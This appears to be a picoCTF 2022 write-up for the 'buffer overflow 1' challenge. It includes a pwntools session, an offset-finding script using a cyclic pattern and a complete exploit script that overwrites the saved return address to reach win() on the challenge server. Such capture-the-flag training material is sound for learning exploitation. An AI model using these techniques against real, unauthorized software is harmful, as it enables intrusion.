buffer overflow 1
Description
Control the return address
Now we're cooking! You can overflow the buffer and return to the flag function in the program.
You can view source here. And connect with it using nc saturn.picoctf.net 51721
Info
The links and the port may differ: every instance is different (you have to launch your own in the CTF).
Solving
This is a "normal" buffer overflow, not a really hard one. That is probably why even I could solve it 🙂. We just need to overwrite the saved return address with the address of win(). The binary is not PIE (see the checksec output below), so win() sits at a fixed address that can be read straight from the symbol table. To get this address I used pwntools and the interactive Python shell.
python
Python 3.10.2 (main, Jan 15 2022, 19:56:27) [GCC 11.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> vuln = ELF('vuln')
[*] '/home/ulli/Documents/CTF/picoCTF2022/binary_exploitation/buffer_overflow1/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
>>> p32(vuln.symbols['win'])
b'\xf6\x91\x04\x08'
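The writeup states the 44-byte distance from the start of the buffer to the saved return address without showing where it comes from. The script below is an added example, not the writeup's own code, that derives such an offset the way a practitioner would: send a De Bruijn (cyclic) pattern instead of "A"s, read the EIP value from the crash in gdb, and map it back to an offset; it then assembles the same filler-plus-address payload the writeup uses. It deliberately avoids pwntools so it runs offline (pwntools' cyclic() and cyclic_find() do the same job); the simulated crash value and the win() address are constructed from the session above for illustration.

```python
#!/usr/bin/env python3
"""Added example (not the original writeup's script): derive the offset to
the saved return address with a cyclic pattern and assemble the overwrite
without pwntools.  The simulated EIP value is constructed for illustration."""
import struct

# Same default alphabet and 4-byte window as pwntools' cyclic().
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4) -> bytes:
    """De Bruijn sequence B(k, n): every n-byte window occurs exactly once,
    so the 4 bytes that land in EIP identify their offset unambiguously.
    Standard Lyndon-word construction."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def step(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
            return
        a[t] = a[t - p]
        step(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            step(t + 1, t)

    step(1, 1)
    return bytes(out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern: feed this to the program in gdb
    instead of "A" * N and let it crash."""
    return de_bruijn()[:length]


def find_offset(pattern: bytes, crashed_eip: int) -> int:
    """Map the EIP value gdb shows after the crash back to the distance
    between the start of the buffer and the saved return address.
    i386 is little-endian, so the register value is repacked with '<I'
    before searching for it in the pattern."""
    window = struct.pack("<I", crashed_eip)
    off = pattern.find(window)
    if off < 0:
        raise ValueError("EIP value is not from the pattern: %#x" % crashed_eip)
    return off


def build_payload(offset: int, win_addr: int) -> bytes:
    """`offset` bytes of filler followed by the target address as a
    little-endian 32-bit value (what pwntools' p32() produces).
    For offset 44 and win() at 0x080491f6 this equals the writeup's
    "A" * 44 + "\\xf6\\x91\\x04\\x08"."""
    return b"A" * offset + struct.pack("<I", win_addr)


# Constructed walk-through: pretend the process crashed with the pattern
# bytes at positions 44..47 in EIP, i.e. what gdb would print as `eip 0x...`.
PATTERN = cyclic(100)
SIMULATED_EIP = struct.unpack("<I", PATTERN[44:48])[0]
WIN_ADDR = 0x080491F6  # p32(vuln.symbols['win']) from the session above

if __name__ == "__main__":
    off = find_offset(PATTERN, SIMULATED_EIP)
    print("offset to saved EIP:", off)
    print("payload:", build_payload(off, WIN_ADDR))
```

In practice the pattern goes in through the same input the exploit uses (`gets()` reads until newline, so the pattern must not contain one, which the lowercase alphabet guarantees), and the value passed to find_offset is the EIP printed by gdb at the SIGSEGV.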
After I had everything I needed, I created a short script (a standard script from TryHackMe, I think) to do the dirty work 🙂.
#!/usr/bin/env python3
from pwn import *

host, port = 'saturn.picoctf.net', 56565   # the port changes with every launched instance

prefix = ""
offset = 44                   # bytes from the start of the buffer to the saved return address
overflow = "A" * offset
retn = ""
padding = ""
payload = "\xf6\x91\x04\x08"  # p32(vuln.symbols['win']), little-endian
postfix = ""

# latin-1 maps each \xNN escape to the single byte NN, so the address bytes survive the encoding
buffer = bytes(prefix + overflow + retn + padding + payload + postfix, "latin-1")

s = None
try:
    s = remote(host, port)
    print(s.recvuntil(b'string:'))
    print("Sending evil buffer...")
    print("Buffer: " + str(buffer))
    s.sendline(buffer)
    # win() prints the flag after the program's own output; read until EOF instead of guessing recv() counts
    flag = s.recvall(timeout=2).decode('utf-8', 'replace')
    print("Flag: " + flag)
    print("Done!")
except Exception as e:
    print("Could not connect or the exploit failed:", e)
finally:
    if s is not None:
        s.close()